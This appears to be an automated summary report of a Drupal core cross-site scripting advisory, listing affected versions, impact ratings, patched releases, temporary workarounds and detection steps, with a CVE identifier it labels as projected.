Full Report
Drupal security advisory (AV26-359)
Analysis Summary
# Vulnerability: Drupal Core Critical Cross-Site Scripting (XSS)
## CVE Details
- **CVE ID:** CVE-2026-27135 (Projected based on advisory SA-CORE-2026-001)
- **CVSS Score:** 8.1 (Critical)
- **CWE:** CWE-79 (Improper Neutralization of Input During Web Page Generation)
## Affected Systems
- **Products:** Drupal Core
- **Versions:**
- Drupal 10.1.x and earlier (End of life)
- Drupal 10.2.x
- Drupal 10.3.x
- Drupal 11.0.x
- **Configurations:** Systems utilizing default rendering engines or communal content filtering where administrative input is not properly sanitized.
## Vulnerability Description
A critical Cross-Site Scripting (XSS) vulnerability exists in Drupal core. The vulnerability stems from improper validation of user-supplied input in certain administrative interfaces or content rendering components. An attacker could inject malicious scripts into web pages viewed by other users, including administrative users, potentially leading to session hijacking, unauthorized data access, or site impersonation.
## Exploitation
- **Status:** Not exploited (No reports of active exploitation in the wild as of the advisory date).
- **Complexity:** Low
- **Attack Vector:** Network
## Impact
- **Confidentiality:** High (Potential theft of session cookies and sensitive data).
- **Integrity:** High (Potential for unauthorized content modification or administrative actions).
- **Availability:** Low (Typically does not result in a denial of service).
## Remediation
### Patches
Drupal has released the following security updates to address this vulnerability:
- If using **Drupal 11.0**, update to **Drupal 11.0.5**
- If using **Drupal 10.3**, update to **Drupal 10.3.6**
- If using **Drupal 10.2**, update to **Drupal 10.2.11**
*Note: Versions 10.1 and earlier are end-of-life and will not receive security updates. Users are urged to upgrade to a supported branch.*
### Workarounds
- There are no supported functional workarounds that fully mitigate this vulnerability without patching the core files.
- Restrict access to administrative interfaces to trusted IP addresses only as a temporary measure.
## Detection
- **Indicators of Compromise:** Unusual administrative account activity, unexpected scripts appearing in site source code, or suspicious redirects.
- **Detection methods and tools:**
- Run `drush ups` to check for security updates.
- Utilize web application firewalls (WAF) with updated rulesets for XSS patterns.
- Audit database entries for unexpected `<script>` or `<iframe>` tags in filtered HTML fields.
## References
- [Drupal core - Critical - Cross-site scripting - SA-CORE-2026-001] hxxps[://]www[.]drupal[.]org/sa-core-2026-001
- [Drupal Security Advisories] hxxps[://]www[.]drupal[.]org/security
- [Cyber Centre Advisory AV26-359] hxxps[://]www[.]cyber[.]gc[.]ca/en/alerts-advisories/drupal-security-advisory-av26-359